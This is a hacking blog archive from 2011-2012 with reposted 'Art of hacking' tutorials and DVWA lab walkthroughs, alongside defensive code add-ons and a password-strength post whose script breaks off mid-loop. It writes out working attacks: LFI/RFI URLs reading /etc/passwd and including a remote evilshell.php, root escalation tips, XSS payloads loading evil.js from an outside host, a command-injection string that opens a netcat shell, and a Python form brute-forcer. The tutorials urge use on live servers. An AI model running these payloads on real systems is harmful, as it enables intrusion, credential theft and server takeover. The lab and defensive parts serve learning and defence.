
Tuesday 28 February 2012

List of Hashing Algorithms Used In Major CMS & Forums

I just found this image via a friend online, and it's a pretty good list of the hashing algorithms used in many web-based applications such as CMS and forum software. Some of these algorithms may be outdated in newer versions, but it is still a good reference.

list of hash algorithms for major web apps


Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.



Thursday 16 February 2012

Art of hacking 4 - spyd3rm4n's guide to hacking

This is part 4 of the Art of Hacking series I've been posting here. Since the original site, dmz, has been down for a long time, I have been uploading these tutorials. This part explains what a PHP shell is and how a PHP shell can be used to gain root access on a server.

[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root

Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}

Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.

The first thing that needs to be done is to get a PHP Shell on the system. This can be done through an RFI (Remote File Inclusion) vulnerability.

Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.

http://site.com/index.php?page=../../../../../etc/passwd

This will show the passwd file on the Linux box, giving you a directory listing for every user on it.

http://site.com/index.php?page=http://anothersite.com/evilshell.php

This will include the evilshell.php located at anothersite.com

Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like

include();
@include();

as long as the include() function includes user input, like

$page = $_GET['page'];

This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);

^ Jackpot.

Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain MySQL information. If you find the reseller's config or global.inc file and it contains root MySQL information, you can use this to look through the MySQL database for any software that requires root input.
Example:

Let's say, for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the MySQL database. Once someone is in the MySQL database and finds the information for that software, they will see the root user and password for the box.

That is one of the most common ways of obtaining root through research. One thing to note is that hosting companies often forget to assign a password for MySQL root. So if you have a PHP Shell, try connecting to the SQL database using the user root and no password. Funny how there is no fix for human error.

Another way to obtain root is through an overflow. You can get these root shells, usually scripts that exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:

There is a process running as root; this process is a result of the program called shell_av (Shell AntiVirus).

Now, let's say I know a local root overflow exploit for shell_av. I will create a script using shellcode (which will be covered in the mini-book on stack/buffer overflows) in C that will overflow this app, and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.

Once executed, the cmd box will output the information for that overflow. Let's say that the overflow only granted root privileges to the user that the shell runs as.
(The PHP Shell is located in the directory /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and log in via SSH, and you have complete control of the box.
}

- Credits : Kr3w of TheDefaced.
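As an added defensive counterpart to the include($page) pattern above (example code of my own, not from the article or its author): a dispatcher that only ever includes pages from a fixed allowlist, plus a scanner over constructed access-log lines that flags ?page= values shaped like the traversal and remote-URL requests shown. The allowlist, the pages/ paths and the log lines are assumptions made for this example.

```python
"""Allowlisted page dispatch and log detection for the include()-based
LFI/RFI pattern (added example; allowlist, paths and log lines are constructed)."""
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed allowlist: the only files index.php?page=... is ever allowed to load.
ALLOWED_PAGES = {
    "about": "pages/about.php",
    "contact": "pages/contact.php",
    "home": "pages/home.php",
}

def resolve_page(user_value, default="home"):
    """Map the untrusted ?page= value to a path from the fixed allowlist.
    Traversal strings, URLs and absolute paths are simply not keys in the
    table, so they fall back to the default page instead of reaching include()."""
    if not isinstance(user_value, str):
        return ALLOWED_PAGES[default]
    key = user_value.strip()
    if key.endswith(".php"):          # accept both "about" and "about.php"
        key = key[:-4]
    return ALLOWED_PAGES.get(key, ALLOWED_PAGES[default])

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")

def classify_page_param(value):
    """Label a raw ?page= value: 'rfi' for a remote URL, 'lfi' for path
    traversal, 'abs' for an absolute path, 'ok' for anything else."""
    v = unquote(value)
    if SCHEME.match(v):
        return "rfi"
    if TRAVERSAL.search(v):
        return "lfi"
    if v.startswith("/"):
        return "abs"
    return "ok"

def scan_access_log(lines):
    """Return (client_ip, label, raw_value) for every request whose page
    parameter looks like an inclusion attempt. Expects common/combined
    Apache log format, where the request path is the 7th whitespace field."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        client, path = parts[0], parts[6]
        for value in parse_qs(urlparse(path).query).get("page", []):
            label = classify_page_param(value)
            if label != "ok":
                hits.append((client, label, value))
    return hits

# Constructed access-log lines mirroring the three URLs in the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2012:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Feb/2012:10:00:02 +0000] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 1440',
    '10.0.0.9 - - [16/Feb/2012:10:00:03 +0000] "GET /index.php?page=http://anothersite.com/evilshell.php HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for client, label, value in scan_access_log(SAMPLE_LOG):
        print("%s %-3s page=%s -> would include %s" % (client, label, value, resolve_page(value)))
```

The allowlist makes the user value a lookup key rather than a path: there is nothing to sanitize because the request never names a file at all. The classifier is for the log side, where the same three shapes (traversal, scheme, absolute path) are what a reviewer would grep for after the fact.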



Tuesday 14 February 2012

Hacking Step by Step For Beginners [Guest Post]

This article is an excellent step-by-step tutorial for those who want to become hackers. Don't expect it to teach you a step-wise process for hacking a website or an e-mail address. Instead, this tutorial aims to show you how to proceed in order to really understand computer systems, so that you become a real computer hacker.


"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?


Does this sound like you? Someone who needs to learn how to hack? And nobody will even speak to you, much less send you any info???


Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.

Ok, here are the step-by-step instructions. Follow them exactly and you will be a real hacker. Once you are comfortable with them, you can branch out into other areas...

[1] Well, if you are a real novice, it is hard; you wouldn't be reading this document now anyway! For starters, get a good INTERNET connection.

[2] Now, the Net runs on Unix-based systems. I guess there is no harm in saying that, since >80% of servers use Linux! So naturally, you have to do the same. So download any Linux distribution (for starters, Linux Mint would be really helpful).

[3] It's time for change, and for real! Install Linux on the full hard drive! It's not like I'm the enemy of other OSes; it's just human nature to avoid change! If it's critical, re-partition your hard drive for dual boot. If you are using Windows, don't even bother about it; they are for lamers anyway.

[4] Get comfortable with the Linux environment. Up to this point you learn about the major distributions & their philosophies. You try different stuff! Change themes, install software! Write your own reviews in blogs, create FB pages and Google groups and post a lot [I wonder how many are still active!]: "Ahh! awesome! just can't wait for the new release of 12.04", something like that.

[5] Start learning a programming language called C. You try to switch between different IDEs, and some bozo will tell you C is just a black screen, no GUI, try something like JAVA, which is worthless shit (or hot air)! Don't be fooled by them, because a real hacker will never use worthless shit (hot air) like JAVA.

[6] This is the time when you find yourself in the religious cult of the distros. Now start learning the black screen with a blinking cursor called the shell. You will realize the importance of that black screen! (I bet you hated the blue screen while, in the far past, you still used Windows.) Learn to the point where you don't need to touch the mouse or need a GUI.

[7] You grow impatient and can't find the stuff you want! And someone tells you to ask in IRC; they are very decent folks and really helpful. You make a fool of yourself talking with bots or getting kicked out / banned. You realize you should read the rules, which eventually makes it your habit to read the man pages of every command even though you don't get it. Don't worry, you are 5% of the way out of lamerland!

[8] You find that gcc is not only the C compiler but a collection of compilers. Its man pages could be turned into a 500-page book. In the meantime, branch out to some cool scripting languages like Python and Perl. You might also want to write your own Linux programs. Read them, use them, read them again, because most of what you read the first time confused you. Now play with Perl, C, C++ on your system until you can actually program. Now practice programming for a while until you get at least a little good at it. Give yourself plenty of time to practice.

[9] It's the time when you have the Linux Journal archive. Now it's time to grab some book called Operating Systems. Now it's time to leave your baby Linux for something serious. I guess you would have now realized that what you were using was totally for posers. If you don't think so, you still have some years left.

[10] By this time Wikipedia, distro forums and programming forums would have been your most visited sites, and you realize the groups on FB are filled with posers and bozos. You understand the true meaning of hacking and you have stockpiled the books and might also be running an Apache server! FTP and Samba too.

[11] Install a non-childish (non-baby) Linux on your system. Install everything. If your system boots up properly to Linux, then congrats! Now that you are running a real OS, read the docs, man pages, how-tos, FAQs, etc. Of course, you won't understand most of it right away, but read all this stuff anyway, so you will know where to look later. Read it all? Ok, go back and read it again. You are 5% of the way to being a hacker!

[12] Now configure your system, for you have tons of text files to edit, and you realize the GUI installer is useless after all. But at this point you might possibly know enough to actually ask a partly intelligent question on the net. You subscribe to tons of mailing lists. Whatever you do, DON'T POST ANYTHING, because nobody wants to read anything you have to say yet. Just lurk for a year or two. You *might* now be on IRC (as long as nobody remembers you were the one who used to talk with bots).

[13] Now you need to get and read all the RFCs. These contain information that is vital if you want to hack the net. Again, you didn't understand everything the first time, so read them all again. You learn about cryptography, file sharing, SSH, SSL, 802.11, lots of stuff. By this time you would have 100 books on the subject! And a long list of your personal notes and reference cards.

[14] Now, you understand the developer mailing list you subscribed to a long time back, and the few security-related mailing lists which you used to ignore and divert to the trash. You should have enough info to try some simple hacks, so try some. If they work, great, you are almost a junior hacker. If they don't work, then do some more reading and try again. Don't give up; keep at it even if it takes you a few years.

[15] Explore the net. Try things. Look for security holes. Read a lot of source code. Write some hacking utilities. At this point, you are now a real junior hacker and start pasting someone's database on Pastebin!

This whole process does take a little bit of time, but it is the quickest way for a lamer to learn to hack. Some of you lamers don't have the brain power to complete the above 15 steps, but try anyway...

True, this might take you a few years, but it will be worth the wait. If you post anything too early, people will know that you are still a lamer and wannabe, and everyone will laugh at you and flame you and call you nasty names, just like when you were on Windows!

Reference and Copies:

17 Steps to Hack
Ubuntards
some cool stuff which I can't remember

The article was originally contributed by rhoit in the foss-nepal mailing list.




Thursday 2 February 2012

Command Execution Vulnerability - Damn Vulnerable Web App Part 2

We worked through the brute force vulnerability in DVWA in part 1 of this series of articles. Today, in this second part, we will exploit the command execution vulnerability within DVWA.

A bit about command execution: Command execution vulnerabilities are common in PHP-based and other web applications. An attacker injects system-level commands or code that gets executed by a call to a system function. This happens because of a lack of proper sanitization of user input. Once again it proves the rule: never trust user data. In our example, we will see direct command execution on the web server caused by a lack of input sanitization before calling a potentially unsafe function.

1) Let's log in with our login information and click on the "Command Execution" item in the left navigation menu.

2) An HTML form titled "Ping for free" will be available. The input box wants an IP address as input and probably uses some system function such as shell_exec(), exec() or maybe system() to ping the given IP address. First let's test whether ping really works by typing "127.0.0.1" in the input textbox. We get the ping response, so we know that some kind of system-level function is being used to execute the ping command.


3) We have concluded that some PHP built-in function is being used to execute the ping command on the server, and the use of such functions opens up the possibility of injecting our own commands if the input we give is not filtered. In our case, the IP address is the input we can play with to find a possible vulnerability. Let's try to tamper with the input: I will give "127.0.0.1;ls -lia" (without quotes) as the input and check the output to see whether our supplied command (ls -lia) gets executed. As the screenshot suggests, our command was successfully injected and we were able to see the output of the "ls -lia" command.


4) The injected command in the previous step gave us the directory listing, but we are hackers and would like shell access to the system, so let's use netcat to get a simple shell. Now let's inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes), which creates a FIFO (named pipe) in the filesystem so that two processes can share the same pipe (interprocess communication becomes possible).

5) Now let's see whether we got the shell by trying to connect to the web server. Fire up a terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get shell access, and bingo!!! we got shell access.


6) Now you can do whatever you want on the web server. You could install backdoors for further access if you find such a vulnerability on live servers. Actually the possibilities are unlimited; it's up to your imagination and creativity once you get a shell on the remote server.

Now let's check the source code of the vulnerable file:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
    
}
?> 

As we can see, the shell_exec() function takes the $target variable as input, which is supplied by the user as $_REQUEST['ip'], and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time you are auditing source code, be sure to check the arguments passed to such functions, and you might be able to spot remote command execution in many PHP scripts.
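A hardened counterpart to the handler above, written in Python rather than PHP (added example, not DVWA code): the target is accepted only if it parses as a literal IP address, and ping is started as an argument vector with no shell, so a value such as 127.0.0.1;ls -lia can never become a second command. A small metacharacter check is included for logging or alerting on attempts; the argument vector and the length limit are my own choices for the example.

```python
"""Hardened counterpart to the DVWA ping handler (added example, not DVWA
code): strict target validation plus argv-based execution with no shell."""
import ipaddress
import platform
import re
import subprocess

# Characters that a bare IP address never contains but shell command
# separators, redirections and substitutions do.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\]")

def validate_target(target):
    """Return the canonical IPv4/IPv6 string if `target` is a literal IP
    address, else None (hostnames and anything with metacharacters fail)."""
    if not isinstance(target, str) or len(target) > 45:
        return None
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None

def looks_like_injection(target):
    """Cheap alerting heuristic for the raw form value before it is rejected."""
    return bool(SHELL_META.search(target))

def build_ping_argv(target):
    """Build ping as an argument vector. With a list and shell=False the
    validated address is exactly one argument; nothing can append a second
    command the way '127.0.0.1;ls -lia' did against the string concatenation."""
    ip = validate_target(target)
    if ip is None:
        raise ValueError("target must be a literal IP address")
    if platform.system() == "Windows":
        return ["ping", "-n", "3", ip]
    return ["ping", "-c", "3", ip]

def ping(target, timeout=10):
    """Run the validated ping without a shell and return its stdout."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout

if __name__ == "__main__":
    for raw in ("127.0.0.1", "::1", "localhost", "127.0.0.1;ls -lia"):
        print("%-20r valid=%-12r injection-looking=%r"
              % (raw, validate_target(raw), looks_like_injection(raw)))
```

Two things do the work here: the allowlist (only values that parse as an IP address survive) and the absence of a shell (the command line is never re-parsed by /bin/sh). Escaping the argument with escapeshellarg() in the PHP original would also stop this particular payload, but validating the type of the input is the more robust rule.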

I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.

Part 1 - Bruteforce Vulnerability



Brute Force Vulnerability - Damn Vulnerable Web App Part 1

Welcome to part 1 of the web hacking series based on Damn Vulnerable Web Application (DVWA). I will guide beginners through various web hacking techniques using the open source DVWA application. I suggest trying things on your own before reading these tutorials; you can then use this series as walkthroughs.

By now, I suppose you have already installed DVWA on your local web server (or maybe on a machine in your local area network). Log in to the DVWA interface with the default username/password combination, which is admin:password. We will first start with the low security level, which can be set from within the interface by clicking on the "DVWA Security" link. So please set the security level to low and make sure you have not enabled PHPIDS for now.

In this very first tutorial, I will guide you through brute-forcing the login form, which you can access from the "Brute Force" item in the left navigation menu.

*** For some reason, code looks ugly but copy/paste will work perfectly. ***

A bit of information on brute force: brute force is a trial-and-error method used to enumerate the working set of candidates for any system. In the computer security field, brute-forcing is generally used to determine authentication credentials, either by exhaustively guessing through permutations and combinations (pure brute force) or by using a dictionary (called a dictionary attack). Usually, each candidate key is run through the same algorithm the system employs and tested against the system's authentication mechanism to determine the correct combination. In our example, we will perform a dictionary attack on a web-based form authentication system.

1) Let's test the login form with random login information (I will test with the admin:admin combination). On giving wrong credentials, the login system shows us the error "Username and/or password incorrect." and we can see the URL in the address bar change to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL tells us that the form uses the GET method, so our credentials become part of the query string in the URL.

2) Manual brute-forcing might take a lot longer than expected, so it's a good idea to write a form brute-forcer. Of course, there are several tools on the internet for form brute-forcing, but we will write our own tool in the Python programming language. Writing a brute-forcer is not a very difficult task, but I expect you to know one programming language. If not, I suggest you grab the basics of at least one language among PHP, Python, Perl and Ruby. Our attack will actually be a dictionary attack, a variant of the brute-force technique in which we test several user:password combinations to find whether any of them work.

3) I hope you have already learnt the basics of one of the languages above. Now let's create a list of possible usernames and a list of possible passwords. You might write these two lists separately in two files for a big list, but for now I'll put the possible usernames and passwords as tuples in the Python code itself.

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

4) Now we will use the urllib2 Python module to send HTTP requests with our username:password combinations. So first let's create the URL we will make requests with. We found earlier that the login information is passed as GET parameters, so things will be a little easier. We can directly craft the action URL using our combinations, which looks as below:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)

5) Now that we have successfully crafted the URL, we have to add cookies to the request header. This can be done easily with the urllib2 module. We need to send cookies reflecting our logged-in status to the DVWA interface; otherwise we will be redirected to DVWA's own login page. We can grab our cookies from the browser. I used the "View Cookie Information" feature of the "Web Developer" plugin I had installed in my Firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()

6) Now that we have successfully read the HTML response, we will make use of the information we gathered earlier when our credentials were wrong. That is, providing wrong credentials printed the error "Username and/or password incorrect." in the HTML output. Hence, we can search for this string, and if it is not present in the HTML output, we can be sure that our current username:password combination works. Our final code becomes:
#!/usr/bin/python

import urllib2

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()
        if "Username and/or password incorrect." not in html:
            print "Working combination --- %s : %s" %(user, password)

7) Now let's run this code from the terminal by typing python bruteforce.py; the result was as follows:

samar@Techgaun:~/Desktop$ python bruteforce.py
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$

8) Let's see if our extracted combinations really work on the website. And voila!!! They work like a charm. This was just a very basic example of how you could brute-force HTTP forms and perform a dictionary attack. I hope you learnt the basics of brute-forcing from this tutorial.
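The same attack seen from the server's log (added example, not part of the tutorial): because this form sends credentials with GET, every guess ends up in the access log verbatim, and a sliding-window count of login requests per client makes the dictionary run stand out. The log lines, the 60-second window, the threshold of 5, the login path and the second client are constructed for this example.

```python
"""Detection-side view of a form dictionary attack: find login bursts in
constructed common-log-format access log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

LOGIN_PATH = "/pvt/dvwa/vulnerabilities/brute/"   # the tutorial's endpoint
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    url = urlparse(rec["path"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec

def login_attempts(lines, login_path=LOGIN_PATH):
    """Keep only requests to the login endpoint that carry a username."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] == login_path and "username" in rec["query"]:
            out.append(rec)
    return out

def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=5):
    """Flag each client IP that makes more than `threshold` login attempts
    within any `window` (sliding over the sorted timestamps). The alert
    carries the peak attempt count and the distinct usernames tried."""
    by_ip = defaultdict(list)
    for rec in login_attempts(lines):
        by_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count > threshold and count > alerts.get(ip, {}).get("attempts", 0):
                users = sorted({r["query"]["username"][0] for r in recs[start:end + 1]})
                alerts[ip] = {"attempts": count, "usernames": users}
    return alerts

def _log_line(ip, second, user, password, size):
    """Build a constructed access-log line in the shape of the tutorial's URL."""
    return ('%s - - [02/Feb/2012:09:15:%02d +0000] "GET %s?username=%s&password=%s&Login=Login HTTP/1.1" 200 %d'
            % (ip, second, LOGIN_PATH, user, password, size))

# Constructed sample: one client sweeping part of the tutorial's wordlist
# within seven seconds, plus one ordinary visitor logging in once.
SAMPLE_LOG = [_log_line("192.0.2.10", s, u, p, 4311) for s, (u, p) in enumerate([
    ("admin", "admin"), ("admin", "administrator"), ("admin", "hacker"),
    ("admin", "password"), ("1337", "admin"), ("1337", "qwerty"), ("1337", "charley"),
], start=1)] + [
    _log_line("192.0.2.20", 30, "alice", "constructed-pw", 4402),
    '192.0.2.20 - - [02/Feb/2012:09:15:31 +0000] "GET /pvt/dvwa/index.php HTTP/1.1" 200 3020',
]

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print("ALERT %s: %d login attempts, usernames tried: %s"
              % (ip, info["attempts"], ", ".join(info["usernames"])))
```

The window-and-threshold rule is deliberately simple; in practice the same counter keyed on username (many sources, one account) catches distributed guessing that a per-IP count misses. The sample also shows why a login form should POST: with GET, the passwords of the one legitimate user are sitting in the same log file the detector reads.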




Tuesday 13 December 2011

Art of hacking 3 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there, but after thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought I'd share this article over here. It is NOT written by me, and I would like to give full credit to the original author.

Previous articles:
Part 1

Part 2


spyd3rm4n's guide to XSS Injection

Part 3

[0x01] XSS_Definition
[0x02] Pen-Testing
[0x03] Common Fields
[0x04] Escaping_BB_Code
[0x05] Image_XSS


Sub XSS_Definition{

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

-Taken from Wikipedia, if you want to read more.
}

Sub Pen-Testing{

Pen-Testing, short for Penetration Testing. Pen-testing with XSS can be very easy, or very hard. It depends on the person doing this. Some common queries when pen-testing a field can include but are not limited to:

<script>alert(1)</script>
<script language="javascript">alert(1)</script>
<script src="http://site.com/evil.js">
<img src="http://site.com/evil.js">


A great site to find some of the most useful queries is http://ha.ckers.org/xss.html

Now, once you've tested the fields, if the page returned contains any sort of popup/javascript, you know it's vulnerable.

}

Sub Common_Fields{

Some of the most common fields that I have noticed are search fields. These will most likely return the following page showing the input.

Example: I search for "Orson Wells" and the page returned: 0 Results for query "Orson Wells" or something of that sort.

There are simple ways to get around this; since I am a PHP coder, my favorite way is htmlentities(), though you can also use strip_tags().

Some other search engines might not show what you searched for on the page itself, but in the field, the value is still there.

If this is the case, you can search for '"/></>[XSS]

this should escape the HTML field value, if it is not sanitized correctly, and execute the [XSS] on the page.

Basically, any field that asks for user input that is either POST or GET and is in the source of the following page, can be cross-site scripted if not properly sanitized.

}

Sub Escaping_BB_Code{

This is one of my favorite ways to XSS a site. Some people decide to create their own BB code or use one that is poorly sanitized. This can be very easy to exploit.

Let's say there is an option to make my font red using the [font color="red"] BB code.

Well, if I post a message with [font color="red"]hi[/font] and I look at the next page's source code, I see <font color="red">hi</font>,

I will re-post using

[font color="red"></font><script>alert(/hi/)</script>]hi[/font]

And if it is poorly sanitized, the page following it would contain an alert box saying /hi/.



There are so many different ways to escape BB code it is almost too easy. Some other sites have [IMG]. This one can be easy also.

[IMG]http://site.com/image"></><script src=http://site.com/evil.js>[/IMG]

would have

<img src="http://site.com/image"></><script src=http://site.com/evil.js>

}

Sub Image_XSS{

This is probably the best discovery to XSS since, whenever. With this, you can place javascript inside an image and have it execute in Internet Explorer.

Refer to: http://milw0rm.com/video/watch.php?id=58

}
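The htmlentities()-style fix the article recommends, worked through in Python (added example, not spyd3rm4n's code): the search-echo page escapes the query before printing it, and the BB-code renderer parses [font] and [IMG] first and escapes everything else, so the two break-out strings quoted above stay literal text. The allowed colour names and the URL character pattern are assumptions made for this example.

```python
"""Output encoding and a strict BB-code renderer for the XSS cases above
(added example; the colour allowlist and URL pattern are constructed choices)."""
import html
import re

def render_search_echo(query):
    """Echo a search term the way the '0 Results for query ...' page does, but
    HTML-escaped (quotes included) so a value like '"/></>[XSS] cannot close
    the input's value attribute or open a tag in the body."""
    safe = html.escape(query, quote=True)
    return ('<input type="text" name="q" value="%s">'
            '<p>0 Results for query "%s"</p>') % (safe, safe)

# Colour names allowed to reach the <font> tag; anything else stays text.
FONT_COLORS = {"red", "blue", "green", "black"}
# A URL may only contain characters that can never break out of src="...".
URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")
# One regex for both tags. Bodies exclude '[' and ']' so a tag inside a tag
# never gets swallowed into a match.
TOKEN_RE = re.compile(
    r'\[font color="(?P<color>[a-z]+)"\](?P<body>[^\[\]]*)\[/font\]'
    r'|\[IMG\](?P<url>[^\[\]]*)\[/IMG\]'
)

def render_bbcode(text):
    """Parse first, escape second: only text captured by TOKEN_RE and passing
    the allowlist checks becomes markup, and even then the user-controlled
    parts are escaped before being placed inside the tag."""
    out, pos = [], 0
    for m in TOKEN_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        if m.group("color") is not None:
            color, body = m.group("color"), m.group("body")
            if color in FONT_COLORS:
                out.append('<font color="%s">%s</font>' % (color, html.escape(body, quote=True)))
            else:
                out.append(html.escape(m.group(0), quote=True))
        else:
            url = m.group("url")
            if URL_RE.fullmatch(url):
                out.append('<img src="%s">' % html.escape(url, quote=True))
            else:
                out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return "".join(out)

if __name__ == "__main__":
    for sample in ('[font color="red"]hi[/font]',
                   '[font color="red"></font><script>alert(/hi/)</script>]hi[/font]',
                   '[IMG]http://site.com/image.png[/IMG]',
                   '[IMG]http://site.com/image"></><script src=http://site.com/evil.js>[/IMG]'):
        print(render_bbcode(sample))
```

The order matters: a renderer that first turns BB code into HTML and then tries to clean the result is the "poorly sanitized" case the article exploits, because the user text has already become markup. Escaping the raw text and emitting tags only from validated captures means there is no point at which the user controls a tag boundary.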



Tuesday 22 November 2011

How To Check Your Password Strength

With the increase in the number of hackers and hack attacks, choosing strong and hard-to-guess passwords is one of the ways to keep yourself secure. While there are numerous other parameters to take care of to stay secure, one of the primitives is choosing a strong password. In this post, I'll let you know how you can determine the strength of the password you choose to use.

The strength of a password can be tested by studying the character combinations used in it, and there are some tools to assist you in this process.

The first tool is the password strength checker. This online tool gives a very comprehensive breakdown of the strength of the password.


Another way to test the strength of a password is to calculate the brute-force attack time needed to recover the password from its hash. One such tool is an Excel template available HERE, which estimates how fast a password is cracked by the widely available tools running on today's desktops. Another online tool for a similar purpose is howsecureismypassword.net, which provides the brute-force time and tells you whether your password is a common one.
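A transparent version of the brute-force-time estimate such tools report (added example, not the code of any tool linked above): the alphabet is the union of the character classes the password uses, the keyspace is that alphabet size to the power of the length, and dividing by an assumed guess rate gives the worst-case time. The guess rate of 10^9 per second and the small common-password list are constructed assumptions.

```python
"""Keyspace, entropy and crack-time estimate for a password (added example;
the guess rate and the common-password list are constructed assumptions)."""
import math
import string

CLASSES = [
    ("lower", set(string.ascii_lowercase)),   # 26
    ("upper", set(string.ascii_uppercase)),   # 26
    ("digit", set(string.digits)),            # 10
    ("symbol", set(string.punctuation)),      # 32
]
# Constructed stand-in for the "is your password a common one" check.
COMMON = {"password", "123456", "qwerty", "iloveyou", "admin"}

def classes_used(pw):
    """Which character classes appear in the password, in CLASSES order."""
    return [name for name, chars in CLASSES if any(c in chars for c in pw)]

def keyspace(pw):
    """Alphabet size (sum of the classes used) raised to the length."""
    used = classes_used(pw)
    alphabet = sum(len(chars) for name, chars in CLASSES if name in used)
    return alphabet ** len(pw) if alphabet else 0

def entropy_bits(pw):
    """log2 of the keyspace: the bits an attacker must search in the worst case."""
    ks = keyspace(pw)
    return math.log2(ks) if ks else 0.0

def crack_time_seconds(pw, guesses_per_second=1e9):
    """Worst-case time to exhaust the keyspace at the assumed rate. A password
    on the common list is found almost instantly whatever its keyspace."""
    if pw.lower() in COMMON:
        return 0.0
    return keyspace(pw) / guesses_per_second

def human_time(seconds):
    """Render seconds in the largest convenient unit."""
    for unit, span in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= span:
            return "%.1f %s" % (seconds / span, unit)
    return "%.1f seconds" % seconds

def assess(pw, guesses_per_second=1e9):
    """Summary dict in the spirit of the online checkers."""
    return {
        "classes": classes_used(pw),
        "bits": round(entropy_bits(pw), 1),
        "common": pw.lower() in COMMON,
        "crack_time": human_time(crack_time_seconds(pw, guesses_per_second)),
    }

if __name__ == "__main__":
    for pw in ("password", "abcdefgh", "Tr0ub4dor&3", "correct horse battery staple"):
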